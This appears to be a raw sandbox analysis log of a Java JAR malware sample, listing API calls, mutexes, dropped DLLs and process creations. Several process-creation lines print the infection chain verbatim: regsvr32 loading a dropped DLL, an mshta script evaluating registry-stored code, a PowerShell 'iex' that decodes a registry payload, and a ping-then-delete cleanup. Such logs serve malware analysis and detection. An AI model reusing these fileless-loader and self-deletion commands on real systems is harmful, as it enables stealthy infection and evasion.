Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059E4D10 RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,memcpy,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,	6_2_059E4D10
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059E790F NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,	6_2_059E790F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059D68EE NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,	6_2_059D68EE
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059D3C5B NtCreateSection,memset,	6_2_059D3C5B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059F33A6 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,	6_2_059F33A6
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059DCBA7 NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,	6_2_059DCBA7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059D4F72 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,	6_2_059D4F72
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059EA680 NtMapViewOfSection,	6_2_059EA680
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059F0A00 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlImageNtHeader,RtlExitUserThread,	6_2_059F0A00
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059E6A33 NtQueryInformationProcess,	6_2_059E6A33
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059EAD9A NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,	6_2_059EAD9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059E09C7 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,	6_2_059E09C7
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059D8936 memset,NtQueryInformationProcess,	6_2_059D8936
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059EE543 NtGetContextThread,RtlNtStatusToDosError,	6_2_059EE543
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059D349A memset,memcpy,NtSetContextThread,RtlNtStatusToDosError,GetLastError,	6_2_059D349A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059F03BD NtQuerySystemInformation,RtlNtStatusToDosError,	6_2_059F03BD
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059F133A NtQueryInformationThread,GetLastError,RtlNtStatusToDosError,	6_2_059F133A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059DC240 NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,	6_2_059DC240
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A275AC NtReadVirtualMemory,	23_2_00A275AC
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A379DC NtQueryInformationToken,NtQueryInformationToken,NtClose,	23_2_00A379DC
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A3991C NtWriteVirtualMemory,	23_2_00A3991C
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A1C29C NtQueryInformationProcess,	23_2_00A1C29C
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A266D4 NtSetInformationProcess,CreateRemoteThread,	23_2_00A266D4
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A4F002 NtProtectVirtualMemory,NtProtectVirtualMemory,	23_2_00A4F002

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_3_1535CC3A	2_3_1535CC3A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_04806680	6_2_04806680
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_04807E30	6_2_04807E30
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_0480175B	6_2_0480175B
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059EED58	6_2_059EED58
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059D98A0	6_2_059D98A0
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059DD8E5	6_2_059DD8E5
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059D2F9C	6_2_059D2F9C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059E0F82	6_2_059E0F82
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059EDE9A	6_2_059EDE9A
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059DB2A4	6_2_059DB2A4
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059DEAFA	6_2_059DEAFA
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A3832C	23_2_00A3832C
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A15080	23_2_00A15080
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A130FC	23_2_00A130FC
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A190FC	23_2_00A190FC
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A1A8C4	23_2_00A1A8C4
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A19CD0	23_2_00A19CD0
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A258DC	23_2_00A258DC
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A25C24	23_2_00A25C24
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A15814	23_2_00A15814
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A11C78	23_2_00A11C78
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A2F598	23_2_00A2F598
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A125E8	23_2_00A125E8
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A275F8	23_2_00A275F8
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A35110	23_2_00A35110
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A1ED6C	23_2_00A1ED6C
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A2CD6C	23_2_00A2CD6C
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A30D44	23_2_00A30D44
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A17D48	23_2_00A17D48
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A3A280	23_2_00A3A280
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A1FEE4	23_2_00A1FEE4
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A20EF4	23_2_00A20EF4
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A3CAF4	23_2_00A3CAF4
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A146C0	23_2_00A146C0
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A36E34	23_2_00A36E34
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A35E3C	23_2_00A35E3C
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A25210	23_2_00A25210
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A36268	23_2_00A36268
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A1624C	23_2_00A1624C
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A18254	23_2_00A18254
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A2625C	23_2_00A2625C
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A1C3B4	23_2_00A1C3B4
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A1BB94	23_2_00A1BB94
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A23BE0	23_2_00A23BE0
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A13B24	23_2_00A13B24
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A2AF34	23_2_00A2AF34
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A27F68	23_2_00A27F68
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A2EF74	23_2_00A2EF74
Source: C:\Windows\System32\control.exe	Code function: 23_2_00A3BB54	23_2_00A3BB54

Source: wfvgme3v.dll.24.dr	Static PE information: No import functions for PE file found
Source: wm2qs3oi.dll.26.dr	Static PE information: No import functions for PE file found

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6708:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\{6263D934-590B-E4FC-F3B6-9D58D74A210C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7012:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: \Sessions\1\BaseNamedObjects\{22FA4B61-1933-A481-B376-5D18970AE1CC}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4260:120:WilError_01
Source: C:\Windows\System32\control.exe	Mutant created: \Sessions\1\BaseNamedObjects\{12AE2B8E-49F6-148B-6366-8D8847FA113C}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3064:120:WilError_01

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\wuxvGLNrxG.jar'' >> C:\cmdlinestart.log 2>&1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\wuxvGLNrxG.jar'
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M
Source: C:\Windows\SysWOW64\icacls.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\winapp.dll
Source: unknown	Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Uxax='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Uxax).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>'
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wfvgme3v\wfvgme3v.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3CF2.tmp' 'c:\Users\user\AppData\Local\Temp\wfvgme3v\CSCBEAB7CEF44BD41E5AC32CBB29DE9912D.TMP'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES50C8.tmp' 'c:\Users\user\AppData\Local\Temp\wm2qs3oi\CSC4DF65D5B5CD44487ACE6B52D8E184D85.TMP'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\winapp.dll'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe 'C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe' -javaagent:'C:\Users\user\AppData\Local\Temp\jartracer.jar' -jar 'C:\Users\user\Desktop\wuxvGLNrxG.jar'	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant 'everyone':(OI)(CI)M	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process created: C:\Windows\SysWOW64\regsvr32.exe regsvr32.exe /s C:\Users\user\winapp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool))	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wfvgme3v\wfvgme3v.cmdline'	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.cmdline'	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES3CF2.tmp' 'c:\Users\user\AppData\Local\Temp\wfvgme3v\CSCBEAB7CEF44BD41E5AC32CBB29DE9912D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES50C8.tmp' 'c:\Users\user\AppData\Local\Temp\wm2qs3oi\CSC4DF65D5B5CD44487ACE6B52D8E184D85.TMP'
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe 'C:\Windows\System32\cmd.exe' /C ping localhost -n 5 && del 'C:\Users\user\winapp.dll'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping localhost -n 5

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_3_1531C064 push ss; retf	2_3_1531C089
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_3_1535CBEF push esp; retf	2_3_1535CBF1
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Code function: 2_3_15357A5F push FFFFFFCFh; iretd	2_3_15357A3E
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_04807AB0 push ecx; ret	6_2_04807AB9
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_04807E1F push ecx; ret	6_2_04807E2F
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_0480B1DE push esp; iretd	6_2_0480B26C
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 6_2_059F528F push ecx; ret	6_2_059F529F

Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	File created: C:\Users\user\winapp.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\wm2qs3oi\wm2qs3oi.dll	Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	File created: C:\Users\user\AppData\Local\Temp\wfvgme3v\wfvgme3v.dll	Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
